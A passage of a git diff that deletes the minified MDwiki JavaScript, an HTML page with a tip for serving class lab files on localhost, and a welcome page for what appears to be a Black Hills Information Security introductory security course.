b=a.module,c=a.src,d=a.options,e=d.license||"OTHER",f=d.loadstage||"skel_ready",g=d.finishstage||"pregimmick",h=d.callback,i=$.Deferred();checkLicense(e,b),log.debug("subscribing "+b.name+" to start: "+f+" end in: "+g),$.md.stage(f).subscribe(function(a){c.startsWith("//")||c.startsWith("http")?$.getScript(c,function(){void 0!==h?h(a):(log.debug("module"+b.name+" script load done: "+c),a()),i.resolve()}):(insertInlineScript(c),log.debug("module"+b.name+" script inject done"),i.resolve(),a())}),$.md.stage(g).subscribe(function(a){i.done(function(){a()})})}function findActiveLinkTrigger(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=getGimmickLinkParts($(b));-1===activeLinkTriggers.indexOf(c.trigger)&&activeLinkTriggers.push(c.trigger)}),log.debug("Scanning for required gimmick links: "+JSON.stringify(activeLinkTriggers))}function loadRequiredScripts(){$.each(activeLinkTriggers,function(a,b){var c=findModuleByTrigger(b);if(void 0===c)return void log.error('Gimmick link: "'+b+'" found but no suitable gimmick loaded');var d=registeredScripts.filter(function(a){return a.module.name===c.name})[0];void 0!==d&&loadScript(d)})}function findModuleByTrigger(a){var b;return $.each(linkTriggers,function(c,d){d.trigger===a&&(b=d.module)}),b}function getGimmickLinkParts($link){var link_text=$.trim($link.toptext());if(null===link_text.match(/gimmick:/i))return null;var href=$.trim($link.attr("href")),r=new RegExp(/gimmick:\s*([^(\s]*)\s*(\(\s*{?(.*)\s*}?\s*\))*/i),matches=r.exec(link_text);if(null===matches||void 0===matches[1])return $.error("Error matching a gimmick: "+link_text),null;var trigger=matches[1].toLowerCase(),args=null;if(void 0!==matches[2]){var params=$.trim(matches[3].toString());"}"===params.charAt(params.length-1)&&(params=params.substring(0,params.length-1)),params="({"+params+"})",params=params.replace(/'/g,'"');try{args=eval(params)}catch(err){log.error("error parsing argument of gimmick: "+link_text+"giving error: "+err)}}return{trigger:trigger,options:args,href:href}}function runGimmicksOnce(){$.each($.md.gimmicks,function(a,b){void 0!==b.once&&b.once()})}function subscribeLinkTrigger(a,b,c){log.debug("Subscribing gimmick "+c.module.name+" to stage: "+c.stage),$.md.stage(c.stage).subscribe(function(d){b.options=b.options||{},jQuery.contains(document.documentElement,a[0])||(log.error("LINK IS NOT IN THE DOM ANYMORE: "),console.log(a)),log.debug("Running gimmick "+c.module.name),c.callback(a,b.options,b.href,d),d()})}$.md.registerGimmick=function(a){$.md.gimmicks.push(a)},$.md.registerScript=function(a,b,c){var d=new ScriptInfo({module:a,src:b,options:c});registeredScripts.push(d)},$.md.registerCss=function(a,b,c){var d=c.license,e=c.stage||"skel_ready",f=c.callback;checkLicense(d,a);var g='<link rel="stylesheet" href="'+b+'" type="text/css"></link>';$.md.stage(e).subscribe(function(a){$("head").append(g),void 0!==f?f(a):a()})},$.md.prepareLink=function(a,b){b=b||{};var c=window.location.protocol;return b.forceSSL?"https://"+a:b.forceHTTP?"http://"+a:"file:"===c?"http://"+a:"//"+a},$.md.linkGimmick=function(a,b,c,d){void 0===d&&(d="gimmick");var e=new LinkTrigger({trigger:b,module:a,stage:d,callback:c});linkTriggers.push(e)},$.md.triggerIsActive=function(a){return-1===activeLinkTriggers.indexOf(a)?!1:!0};var initialized=!1;$.md.initializeGimmicks=function(){findActiveLinkTrigger(),runGimmicksOnce(),loadRequiredScripts()};var log=$.md.getLogger(),activeLinkTriggers=[],registeredScripts=[],linkTriggers=[],licenses=["MIT","BSD","GPL","GPL2","GPL3","LGPL","LGPL2","APACHE2","PUBLICDOMAIN","EXCEPTION","OTHER"];$.md.registerLinkGimmicks=function(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=$(b),d=getGimmickLinkParts(c);$.each(linkTriggers,function(a,b){d.trigger===b.trigger&&subscribeLinkTrigger(c,d,b)})})}}(jQuery),function(a){function b(){var b;if(a.md.config.title&&a("title").text(a.md.config.title),b=a("#md-content h1").eq(0),a.trim(b.toptext()).length>0){a("#md-title").prepend(b);{b.toptext()}}else a("#md-title").remove()}function c(){a("#md-content p").each(function(){var b=a(this);if(0!==a.trim(b.text()).length){var c=b.contents().filter(function(){var b=a(this);return"A"===this.tagName&&b.find("img").length>0?!0:"IMG"===this.tagName?!0:!1}),d=e(b);b.wrapInner('<div class="md-text" />'),0!==c.length&&(c.prependTo(b),b.addClass("md-floatenv").addClass(d))}})}function d(){a(".md-floatenv").find(".md-text").each(function(){var b=a(this).find("*").eq(0);b.is("br")&&b.remove()}),a(".md-image-group").find("br").remove()}function e(b){var c=a(b),d="",e=c.contents().filter(function(){return"IMG"===this.tagName||"IFRAME"===this.tagName?!0:"A"===this.tagName?a(this).find("img").length>0:a.trim(a(this).text()).length>0}),f=e[0];return void 0!==f&&null!==f&&(d="IMG"===f.tagName||"IFRAME"===f.tagName?"md-float-left":"A"===f.tagName&&a(f).find("img").length>0?"md-float-left":"md-float-right"),d}function f(){var b=a("p img").parents("p");b.addClass("md-image-group")}function g(){function b(){return c=a("img").filter(function(){var b=a(this).parents("a").eq(0);if(0===b.length)return!0;var c=b.attr("href");return c&&0===c.length})}var c=b();return c.each(function(){var b=a(this),c=b.attr("src"),d=b.attr("title");void 0===d&&(d=""),b.wrap('<a class="md-image-selfref" href="'+c+'" title="'+d+'"/> ')})}function h(){function b(b,c){var d=a.md.config.anchorCharacter,e=a('<span class="anchor-highlight"><a>'+d+"</a></span>");e.find("a").attr("href",c),e.hide();var f=!1;b.mouseenter(function(){f=!0,a.md.util.wait(300).then(function(){f&&e.fadeIn(200)})}),b.mouseleave(function(){f=!1,e.fadeOut(200)}),e.appendTo(b)}function c(b){if(a.md.config.useSideMenu!==!1&&"H2"===b.prop("tagName")){var c=a.md.config.tocAnchor;if(""!==c){var d=a('<a class="visible-xs visible-sm jumplink" href="#md-page-menu">'+c+"</a>");d.click(function(b){b.preventDefault(),a("body").scrollTop(a("#md-page-menu").position().top)}),0===b.parents("#md-menu").length&&d.insertAfter(b)}}}a("h1,h2,h3,h4,h5,h6").not("#md-title h1").each(function(){var d=a(this);d.addClass("md-inpage-anchor");var e=d.clone().children(".anchor-highlight").remove().end().text(),f=a.md.util.getInpageAnchorHref(e);b(d,f),c(d)})}var i={createBasicSkeleton:function(){b(),c(),g(),f(),d(),h(),a.md.stage("all_ready").subscribe(function(b){""!==a.md.inPageAnchor&&a.md.util.wait(500).then(function(){a.md.scrollToInPageAnchor(a.md.inPageAnchor)}),b()})}};a.md.publicMethods=a.extend({},a.md.publicMethods,i),a.md.scrollToInPageAnchor=function(b){b.startsWith("#")&&(b=b.substring(1,b.length));var c=!1;a(".md-inpage-anchor").each(function(){if(!c){var d=a(this),e=d.toptext(),f=a.md.util.getInpageAnchorText(e);if(b===f){this.scrollIntoView(!0);var g=a(".navbar-collapse").height()+5;window.scrollBy(0,-g+5),c=!0}}})}}(jQuery),function(a){"use strict";function b(){if(!(a("#md-menu").length<=0)){o="top";var b=a("#md-menu").children(),c="";c+='<div id="md-main-navbar" class="navbar navbar-default navbar-fixed-top" role="navigation">',c+='<div class="navbar-header">',c+='<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">',c+='<span class="sr-only">Toggle navigation</span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+="</button>",c+='<a class="navbar-brand" href="#"></a>',c+="</div>",c+='<div class="collapse navbar-collapse navbar-ex1-collapse">',c+='<ul class="nav navbar-nav" />',c+='<ul class="nav navbar-nav navbar-right" />',c+="</div>",c+="</div>";var e=a(c);e.appendTo("#md-menu"),a("#md-menu ul.nav").eq(0).append(b),a("#md-menu").prependTo("#md-all");var f=a("#md-menu h1").toptext();a("#md-menu h1").remove(),a("a.navbar-brand").text(f),a("#md-body").css("margin-top","70px"),a.md.stage("pregimmick").subscribe(function(a){d(),a()})}}function c(){var b=a("#md-main-navbar").height()+10;a("#md-body").css("margin-top",b+"px")}function d(){var b=0,d=a.md.util.repeatUntil(40,function(){return b=a("#md-main-navbar").height(),b>35&&481>b},25);d.done(function(){b=a("#md-main-navbar").height(),c();var d=a.md.util.repeatUntil(20,function(){return b!==a("#md-main-navbar").height()
-},25);d.done(function(){c()}),a.md.util.wait(2e3).done(function(){c()})})}function e(){if(0!==a("#md-menu a").length){var c=a("#md-menu");c.find('> a[href=""]').attr("data-toggle","dropdown").addClass("dropdown-toggle").attr("href","").append('<b class="caret"/>'),c.find("ul").addClass("dropdown-menu"),c.find("ul li").addClass("dropdown"),a("#md-menu hr").each(function(b,c){var d=a(c),e=d.prev(),f=d.next();e.is("ul")&&e.length>=0&&(e.append(a('<li class="divider"/>')),d.remove(),f.is("ul")&&(f.find("li").appendTo(e),f.remove()))}),a("#md-menu ul").each(function(b,c){var d=a(c);0===d.find("li").length&&d.remove()}),a("#md-menu hr").replaceWith(a('<li class="divider-vertical"/>')),a("#md-menu > a").wrap("<li />"),a("#md-menu ul").each(function(b,c){var d=a(c);d.appendTo(d.prev()),d.parent("li").addClass("dropdown")}),a("#md-menu li.dropdown").find("h1, h2, h3").each(function(b,c){var d=a(c),e=d.toptext(),f=a('<li class="dropdown-header" />');f.text(e),d.replaceWith(f)}),b()}}function f(b){var c=a(b),d=a(window).scrollTop(),e=d+a(window).height(),f=c.offset().top,g=f+c.height();return e>=g&&f>=d}function g(){var b=a("#md-content").find("h2").clone();if(b.children().remove(),!(b.length<=1)){a("#md-content").removeClass("col-md-12"),a("#md-content").addClass("col-md-9"),a("#md-content-row").prepend('<div class="col-md-3" id="md-left-column"/>');var c=function(){var b=a("#md-left-column").css("width");a("#md-page-menu").css("width",b)};a(window).scroll(function(){c(a("#md-page-menu"));var b;a("*.md-inpage-anchor").each(function(c,d){if(void 0===b){var e=a(d);f(e)&&(b=e)}}),a("#md-page-menu a").each(function(c,d){var e=a(d);b&&e.toptext()===b.toptext()&&(a("#md-page-menu a.active").removeClass("active"),e.addClass("active"))})});var e=a('<div id="md-page-menu" />'),g=70;e.affix({offset:130}),e.css("top",g);var h=a('<div class="panel panel-default"><ul class="list-group"/></div>'),i=h.find("ul");e.append(h),b.each(function(b,c){var d=a(c),e=a('<li class="list-group-item" />'),f=a("<a />");f.attr("href",a.md.util.getInpageAnchorHref(d.toptext())),f.click(function(b){b.preventDefault();var c=a(this),d=a.md.util.getInpageAnchorText(c.toptext());a.md.scrollToInPageAnchor(d)}),f.text(d.toptext()),e.append(f),i.append(e)}),a(window).resize(function(){c(a("#md-page-menu")),d()}),a.md.stage("postgimmick").subscribe(function(a){a()}),a("#md-left-column").append(e)}}function h(){a("#md-title").wrap('<div class="container" id="md-title-container"/>'),a("#md-title").wrap('<div class="row" id="md-title-row"/>'),a("#md-menu").wrap('<div class="container" id="md-menu-container"/>'),a("#md-menu").wrap('<div class="row" id="md-menu-row"/>'),a("#md-content").wrap('<div class="container" id="md-content-container"/>'),a("#md-content").wrap('<div class="row" id="md-content-row"/>'),a("#md-body").wrap('<div class="container" id="md-body-container"/>'),a("#md-body").wrap('<div class="row" id="md-body-row"/>'),a("#md-title").addClass("col-md-12"),a("#md-content").addClass("col-md-12")}function i(){var b=a('<div class="page-header" />');a("#md-title").wrapInner(b)}function j(){if(0!==a("#md-menu").find("li").length){var b=window.location.hash;0===b.length&&(b="#!index.md");var c='li:has(a[href="'+b+'"])';a("#md-menu").find(c).addClass("active")}}function k(){var b=a("p img").parents("p");b.each(function(){function b(b,c){return d.each(function(b,d){var e=a(d),f=e.parent("a");f.length>0?f.wrap(c):e.wrap(c)})}var c=a(this),d=a(this).find("img").filter(function(){return 0===a(this).parents("a").length}).add(a(this).find("img")).addClass("img-responsive").addClass("img-thumbnail");c.hasClass("md-floatenv")?1===d.length?b(d,'<div class="col-sm-8" />'):2===d.length?b(d,'<div class="col-sm-4" />'):b(d,'<div class="col-sm-2" />'):1===d.length?b(d,'<div class="col-sm-12" />'):2===d.length?b(d,'<div class="col-sm-6" />'):3===d.length?b(d,'<div class="col-sm-4" />'):4===d.length?b(d,'<div class="col-sm-3" />'):b(d,'<div class="col-sm-2" />'),c.addClass("row")})}function l(){a("iframe.md-external").not(".md-external-nowidth").attr("width","450").css("width","450px"),a("iframe.md-external").not(".md-external-noheight").attr("height","280").css("height","280px"),a("div.md-external").not(".md-external-noheight").css("height","280px"),a("div.md-external").not(".md-external-nowidth").css("width","450px")}function m(){var b="";b+='<hr><div class="scontainer">',b+='<div class="pull-right md-copyright-footer"> ',b+='<span id="md-footer-additional"></span>',b+='Website generated with <a href="http://www.mdwiki.info">MDwiki</a> ',b+="&copy; Timo D&ouml;rr and contributors. ",b+="</div>",b+="</div>";var c=a(b);c.css("position","relative"),c.css("margin-top","1em"),a("#md-all").append(c)}function n(){var b=a.md.config.additionalFooterText;b&&a(".md-copyright-footer #md-footer-additional").html(b)}a.mdbootstrap=function(b){return a.mdbootstrap.publicMethods[b]?a.mdbootstrap.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.mdbootstrap")},a.mdbootstrap.events=[],a.mdbootstrap.bind=function(b,c){a(document).bind(b,c),a.mdbootstrap.events.push(b)},a.mdbootstrap.trigger=function(b){a(document).trigger(b)};var o="",p={bootstrapify:function(){h(),e(),i(),k(),a("table").addClass("table").addClass("table-bordered"),a.md.stage("pregimmick").subscribe(function(b){a.md.config.useSideMenu!==!1&&g(),m(),n(),b()}),a.md.stage("postgimmick").subscribe(function(a){l(),j(),a()})}};a.mdbootstrap.publicMethods=a.extend({},a.mdbootstrap.publicMethods,p)}(jQuery),function(a){a.gimmicks=a.fn.gimmicks=function(b){return void 0!==b?a.fn.gimmicks.methods[b]?a.fn.gimmicks.methods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Gimmick "+b+" does not exist on jQuery.gimmicks"):void 0}}(jQuery),function(a){function b(){var b=a(c());b.each(function(){var b=a(this.p),c=this.alertType;b.addClass("alert"),"note"===c?b.addClass("alert-info"):"hint"===c?b.addClass("alert-success"):"warning"===c&&b.addClass("alert-warning")})}function c(){var b=["note","beachte"],c=["achtung","attention","warnung","warning","atención","guarda","advertimiento"],d=["hint","tipp","tip","hinweis"],e=b.concat(c);e=e.concat(d);var f=[];return a("p").filter(function(){var g=a(this);a(e).each(function(e,h){var i=g.text().toLowerCase(),j=new RegExp(h+"(:|!)+.*","i"),k="none";null!==i.match(j)&&(a.inArray(h,b)>=0?k="note":a.inArray(h,c)>=0?k="warning":a.inArray(h,d)>=0&&(k="hint"),f.push({p:g,alertType:k}))})}),f}var d={name:"alerts",load:function(){a.md.stage("bootstrap").subscribe(function(a){b(),a()})}};a.md.registerGimmick(d)}(jQuery),function(a){var b={name:"colorbox",load:function(){a.md.stage("gimmick").subscribe(function(b){a.gimmicks("colorbox"),b()})}};a.md.registerGimmick(b);var c={colorbox:function(){var b;b=a(this instanceof jQuery?this:".md-image-group");var c=0;return b.each(function(){var b=a(this),d="gallery-group-"+c++;b.find("a.md-image-selfref img").parents("a").colorbox({rel:d,opacity:.75,slideshow:!0,maxWidth:"95%",maxHeight:"95%",scalePhotos:!0,photo:!0,slideshowAuto:!1})})}};a.gimmicks.methods=a.extend({},a.fn.gimmicks.methods,c)}(jQuery),function(a){"use strict";function b(b,c,d){var e=a('<div id="myCarousel" class="carousel slide"></div>'),f=a('<div class="carousel-inner"/>');e.append('<ol class="carousel-indicators" />');var g=[];a.each(d.split(","),function(b,c){g.push(a.trim(c)),e.find("ol").append('<li data-target="#myCarousel" data-slide-to="'+b+'" class="active" /');var d;d=0===b?'<div class="active item"/>':'<div class="item"/>',f.append(a(d).append('<img src="'+c+'"/>'))}),e.append(f),e.append('<a class="carousel-control left" href="#myCarousel" data-slide="prev">&lsaquo;</a>'),e.append('<a class="carousel-control right" href="#myCarousel" data-slide="next">&rsaquo;</a>'),b.replaceWith(e)}var c={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"carousel",b)}};a.md.registerGimmick(c)}(jQuery),function(a){var b={name:"disqus",version:a.md.version,once:function(){a.md.linkGimmick(this,"disqus",d)}};a.md.registerGimmick(b);var c=!1,d=function(b,d){var e={identifier:""},f=a.extend(e,d),g=a('<div id="disqus_thread" class="md-external md-external-noheight md-external-nowidth" ><a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></div>');return g.css("margin-top","2em"),b.each(function(b,d){if(c!==!0){c=!0;var e=a(d),h=e.attr("href");void 0!==h&&h.length>0&&(e.remove(),a("#md-content").append(g),a("#disqus_thread").length>0&&!function(){var a,b=window.location.href;a=f.identifier.length>0?f.identifier:b;var c=document.createElement("script");c.type="text/javascript",c.async=!0,c.src="http://"+h+".disqus.com/embed.js",(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]).appendChild(c)}())}})}}(jQuery),function(a){function b(b,c){var d={layout:"standard",showfaces:!0},f=a.extend({},d,c);return"boxcount"===f.layout&&(f.layout="box_count"),"buttoncount"===f.layout&&(f.layout="button_count"),b.each(function(b,c){var d=a(c),g=d.attr("href");a("body").append(e);var h=a('<div class="fb-like" data-send="false" data-width="450"></div>');h.attr("data-href",g),h.attr("data-layout",f.layout),h.attr("data-show-faces",f.showfaces),d.replaceWith(h)})}var c=window.navigator.userLanguage||window.navigator.language,d=c+"_"+c.toUpperCase(),e=a('<div id="fb-root" />'),f=a.md.prepareLink("connect.facebook.net/"+d+"/all.js#xfbml=1",{forceHTTP:!0}),g='(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "'+f+'"; fjs.parentNode.insertBefore(js, fjs);}(document, "script", "facebook-jssdk"));',h={name:"FacebookLike",version:a.md.version,once:function(){a.md.linkGimmick(this,"facebooklike",b),a.md.registerScript(this,g,{license:"APACHE2",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(h)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var e=a(d),f={color:"red",position:"right"},g=a.extend({},f,c),h=g.color,i=g.position,j="https://s3.amazonaws.com/github/ribbons/forkme_";"red"===h&&(j+=i+"_red_aa0000.png"),"green"===h&&(j+=i+"_green_007200.png"),"darkblue"===h&&(j+=i+"_darkblue_121621.png"),"orange"===h&&(j+=i+"_orange_ff7600.png"),"white"===h&&(j+=i+"_white_ffffff.png"),"gray"===h&&(j+=i+"_gray_6d6d6d.png");var k=e.attr("href"),l=0,m=a('<a class="forkmeongithub" href="'+k+'"><img style="position: absolute; top: '+l+";"+i+': 0; border: 0;" src="'+j+'" alt="Fork me on GitHub"></a>');a("body").prepend(m),m.find("img").css("z-index","2000"),e.remove()})}var c={name:"forkmeongithub",version:a.md.version,once:function(){a.md.linkGimmick(this,"forkmeongithub",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c,d){return a().lazygist("init"),b.each(function(b,c){var e=a(c),f=a('<div class="gist_here" data-id="'+d+'" />');e.replaceWith(f),f.lazygist({url_template:"https://gist.github.com/{id}.js?"})})}var c={name:"gist",once:function(){a.md.linkGimmick(this,"gist",b)}};a.md.registerGimmick(c)}(jQuery),function(a,b,c,d){"use strict";function e(b){var e,f,g;if(-1!==b.indexOf('rel="stylesheet"'))f=a(b).attr("href"),-1===a.inArray(f,k)&&(a("head").append(b),k.push(f));else if(-1!==b.indexOf('id="gist')){if(e=/gist([\d]{1,})/g.exec(b),g=e[1],g!==d){if(-1!==a.inArray(g,l))return;l.push(g),a(".gist_here[data-id="+g+"]").append(b)}}else j.apply(c,arguments)}var f,g="lazygist",h="0.2pre",i={url_template:"https://gist.github.com/{id}.js?file={file}",id:"data-id",file:"data-file"},j=c.write,k=[],l=[],m=[],n={init:function(b){return f=a.extend({},i,b),c.write=e,a.each(f,function(a,b){if("string"!=typeof b)throw new TypeError(b+" ("+typeof b+") is not a string")}),this.lazygist("load")},load:function(){return this.filter("["+f.id+"]").each(function(){var b,c=a(this).attr(f.id),e=a(this).attr(f.file);if(c!==d){if(-1!==a.inArray(c,m))return;m.push(c),b=f.url_template.replace(/\{id\}/g,c).replace(/\{file\}/g,e),a.getScript(b,function(){})}})},reset_write:function(){return c.write=j,this}};a.fn[g]=function(b){return n[b]?n[b].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof b&&b?void a.error("Method "+b+" does not exist on jQuery.lazygist"):n.init.apply(this,arguments)},a.fn[g].version=h}(jQuery,window,document);var googlemapsLoadDone;!function(a){function b(b,d){{var e=b;(new Date).getTime()}return e.each(function(b,e){var f=a(e),g={zoom:11,marker:!0,scrollwheel:!1,maptype:"roadmap"},h=a.extend({},g,d);void 0===h.address&&(h.address=f.attr("href"));var i="google-map-"+Math.floor(1e5*Math.random()),j=a('<div class="md-external md-external-nowidth" id="'+i+'"/>');f.replaceWith(j),c(h,i)})}function c(b,c){var d=b.maptype.toUpperCase();b.mapTypeId=google.maps.MapTypeId[d];var e=new google.maps.Geocoder;e.geocode({address:b.address},function(d,e){if("OK"===e){var f=d[0].geometry.location,g=a.extend({},b,{center:f}),h=new google.maps.Map(document.getElementById(c),g);if(g.marker===!0){new google.maps.Marker({position:f,map:h})}}})}var d="http://maps.google.com/maps/api/js?sensor=false&callback=googlemapsReady",e={name:"googlemaps",version:a.md.version,once:function(){googlemapsLoadDone=a.Deferred(),a.md.linkGimmick(this,"googlemaps",b),a.md.registerScript(this,d,{license:"EXCEPTION",loadstage:"skel_ready",finishstage:"bootstrap"}),a.md.stage("bootstrap").subscribe(function(b){a.md.triggerIsActive("googlemaps")?googlemapsLoadDone.done(function(){b()}):b()})}};a.md.registerGimmick(e)}(jQuery),function(a){function b(){var b=a("pre code[class^=lang-]");return b.each(function(){var b=a(this),c=b.attr("class"),d=c.substring(5);b.removeClass(c),b.addClass(d);hljs.highlightBlock(b[0])})}var c={name:"highlight",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var e=a(d),f=e.attr("href"),g=a('<iframe class="col-md-12" style="border: 0px solid red; height: 650px;"></iframe>');if(g.attr("src",f),e.replaceWith(g),c.width&&g.css("width",c.width),c.height)g.css("height",c.height);else{var h=function(){var b=g.offset(),c=a(window).height(),d=c-b.top-5;g.height(d)};g.load(function(){h()}),a(window).resize(function(){h()})}})}var c={name:"iframe",version:a.md.version,once:function(){a.md.linkGimmick(this,"iframe",b)}};a.md.registerGimmick(c)}(jQuery),function(a){function b(b){b.remove();var c=document.createElement("script");c.type="text/javascript",c.src=a.md.prepareLink("cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML",{forceHTTP:!0}),document.getElementsByTagName("head")[0].appendChild(c)}var c={name:"math",once:function(){a.md.linkGimmick(this,"math",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";var b=[{name:"bootstrap",url:"netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css"},{name:"amelia",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/amelia/bootstrap.min.css"},{name:"cerulean",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cerulean/bootstrap.min.css"},{name:"cosmo",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cosmo/bootstrap.min.css"},{name:"cyborg",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cyborg/bootstrap.min.css"},{name:"flatly",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/flatly/bootstrap.min.css"},{name:"journal",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/journal/bootstrap.min.css"},{name:"readable",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/readable/bootstrap.min.css"},{name:"simplex",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/simplex/bootstrap.min.css"},{name:"slate",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/slate/bootstrap.min.css"},{name:"spacelab",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/spacelab/bootstrap.min.css"},{name:"united",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/united/bootstrap.min.css"},{name:"yeti",url:"netdna.bootstrapcdn.com/bootswatch/3.0.2/yeti/bootstrap.min.css"}],c=!1,d={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"themechooser",h,"skel_ready"),a.md.linkGimmick(this,"theme",g)}};a.md.registerGimmick(d);var e=a.md.getLogger(),f=function(c){if(c.inverse=c.inverse||!1,void 0===c.url){if(!c.name)return void e.error("Theme name must be given!");var d=b.filter(function(a){return a.name===c.name})[0];if(!d)return void e.error("Theme "+name+" not found, removing link");c=a.extend(c,d)}a('link[rel=stylesheet][href*="netdna.bootstrapcdn.com"]').remove();var f=a("style[id*=bootstrap]").length>0;"bootstrap"===c.name&&f||(a("style[id*=bootstrap]").remove(),a('<link rel="stylesheet" type="text/css">').attr("href",a.md.prepareLink(c.url)).appendTo("head")),c.inverse===!0?(a("#md-main-navbar").removeClass("navbar-default"),a("#md-main-navbar").addClass("navbar-inverse")):(a("#md-main-navbar").addClass("navbar-default"),a("#md-main-navbar").removeClass("navbar-inverse"))},g=function(b,d,e){d.name=d.name||e,b.each(function(b,e){a.md.stage("postgimmick").subscribe(function(b){a(e);void 0!==window.localStorage.theme&&c||f(d),b()})}),b.remove()},h=function(d,e,f){return c=!0,a.md.stage("bootstrap").subscribe(function(a){i(e),a()}),d.each(function(c,d){var e=a(d),g=a('<a href=""></a><ul></ul>');g.eq(0).text(f),a.each(b,function(b,c){var d=a("<li></li>");g.eq(1).append(d);a("<a/>").text(c.name).attr("href","").click(function(a){a.preventDefault(),window.localStorage.theme=c.name,window.location.reload()}).appendTo(d)}),g.eq(1).append('<li class="divider" />');var h=a("<li/>"),i=a("<a>Use default</a>");i.click(function(a){a.preventDefault(),window.localStorage.removeItem("theme"),window.location.reload()}),h.append(i),g.eq(1).append(h),g.eq(1).append('<li class="divider" />'),g.eq(1).append('<li><a href="http://www.bootswatch.com">Powered by Bootswatch</a></li>'),e.replaceWith(g)})},i=function(b){window.localStorage.theme&&(b=a.extend({name:window.localStorage.theme},b),f(b))}}(jQuery),function(a){var b=a.md.prepareLink("platform.twitter.com/widgets.js"),c='!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="'+b+'";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");',d={name:"TwitterGimmick",version:a.md.version,once:function(){a.md.linkGimmick(this,"twitterfollow",e),a.md.registerScript(this,c,{license:"EXCEPTION",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(d);var e=function(b){return b.each(function(b,c){var d,e=a(c),f=e.attr("href");if(f.indexOf("twitter.com")<=0){d=e.attr("href"),f=a.md.prepareLink("twitter.com/"+d),"@"===d[0]&&(d=d.substring(1));var g=a('<a href="'+f+'" class="twitter-follow-button" data-show-count="false" data-lang="en" data-show-screen-name="false">@'+d+"</a>");e.replaceWith(g)}})}}(jQuery),function(a){function b(){var b=a("a[href*=youtube\\.com]:empty, a[href*=youtu\\.be]:empty");b.each(function(){var b=a(this),c=b.attr("href");if(void 0!==c){var d=/.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/,e=c.match(d);if(e&&11===e[1].length){var f=e[1],g=a('<iframe class="md-external" frameborder="0" allowfullscreen></iframe>');g.attr("src","http://youtube.com/embed/"+f),b.replaceWith(g)}}})}var c={name:"youtube",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){var d={type:"class",style:"plain",direction:"LR",scale:"100"},e=a.extend({},d,c);return b.each(function(b,c){var d=a(c),f="http://yuml.me/diagram/",g=d.attr("href"),h=d.attr("title");h=h?h:"",g=g.replace(new RegExp("`","g"),"(").replace(new RegExp("´","g"),")"),f+=e.style+";dir:"+e.direction+";scale:"+e.scale+"/"+e.type+"/"+g;var i=a('<img src="'+f+'" title="'+h+'" alt="'+h+'">');d.replaceWith(i)})}var c={name:"yuml",version:a.md.version,once:function(){a.md.linkGimmick(this,"yuml",b),a.md.registerScript(this,"",{license:"LGPL",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(c)}(jQuery);</script>
-<!-- END dist/MDwiki.min.js -->
-
-</head>
-<body>
-
-    <noscript>
-        This website requires Javascript to be enabled. Please turn on Javascript
-        and reload the page.
-    </noscript>
-    <div id="md-all">
-    </div>
-<p> Hey! Labs not loading because an update got you down?  No problem.  Just open a Bash Shell as Administrator from Windows Terminal and paste in the following:<p>
-<b> bash -c "tmux new -d -s websrv; tmux send 'cd /mnt/c/IntroLabs/IntroClassFiles/ && python3 -m http.server 8888 &' ENTER;"</b>
-<p>Hit Enter, then open this URL in Edge inside the VM: <a href="http://localhost:8888/">http://localhost:8888/</a></p>
-</body>
-</html>
diff --git a/IntroClassFiles/index.md b/IntroClassFiles/index.md
deleted file mode 100755
index 51f2775b..00000000
--- a/IntroClassFiles/index.md
+++ /dev/null
@@ -1,41 +0,0 @@
-Welcome to the Black Hills Information Security Intro To Security Class!
-
-
-
-Brought to you by:
-
-
-
-![image-20200713093457194](C:\Users\adhd\AppData\Roaming\Typora\typora-user-images\image-20200713093457194.png)
-
-
-
-https://www.blackhillsinfosec.com/
-
-
-
-
-
-And..
-
-
-
-[![Active Countermeasures](https://www.activecountermeasures.com/wp-content/uploads/2018/08/acm_header_logo.png)](https://www.activecountermeasures.com/)
-
-
-
-
-
-https://www.activecountermeasures.com/
-
-
-
-Check out our other training at:
-
-
-
-https://wildwesthackinfest.com/online-training/
-
-
-
